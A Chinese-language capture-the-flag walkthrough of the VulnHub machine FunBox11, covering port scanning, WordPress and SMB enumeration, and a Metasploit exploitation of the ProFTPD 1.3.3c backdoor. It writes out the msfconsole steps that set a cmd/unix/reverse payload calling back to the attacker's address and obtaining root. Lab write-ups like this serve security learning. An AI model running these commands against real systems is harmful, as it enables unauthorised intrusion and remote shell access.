一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:FunBox11(10.0.2.36)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.36
使用nmap端口扫描发现靶机开放端口:21、22、25、80、110、139、143、445
21端口:nmap扫描发现21端口为ProFTPD 1.3.3c
,可以使用命令searchsploit ProFTPD 1.3.3c
搜索ProFTPD的历史漏洞,发现存在远程命令执行漏洞
可以使用msfconsole进行渗透
22端口:nmap扫描发现22端口为OpenSSH 7.2p2
,可以使用命令searchsploit OpenSSH 7.2p2
搜索OpenSSH 的历史漏洞,发现用户枚举漏洞
80端口:打开网站,点击Funbox: Scriptkiddie
,会重定向到域名:funbox11
,修改hosts文件,添加一条数据,保存,再次访问
10.0.2.36 funbox11
使用dirb工具进行目录爆破,发现该网站为wordpress框架搭建的
直接上wpscan工具进行扫描,枚举发现一个用户名:admin
wpscan --url http://funbox11/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive
445端口:使用enum4linux
工具枚举smb服务信息,发现一个用户名:bill
enum4linux -a -o 10.0.2.36
三、漏洞利用
openssh用户枚举漏洞,执行exp发现该漏洞不存在
ProFTPD 远程命令执行漏洞,使用msfconsole进行渗透
search ProFTPd-1.3.3c
use 0
show options
set rhosts 10.0.2.36
show payloads
set payload cmd/unix/reverse
show options
set lhost 10.0.2.15
exploit
直接获得root权限
获取flag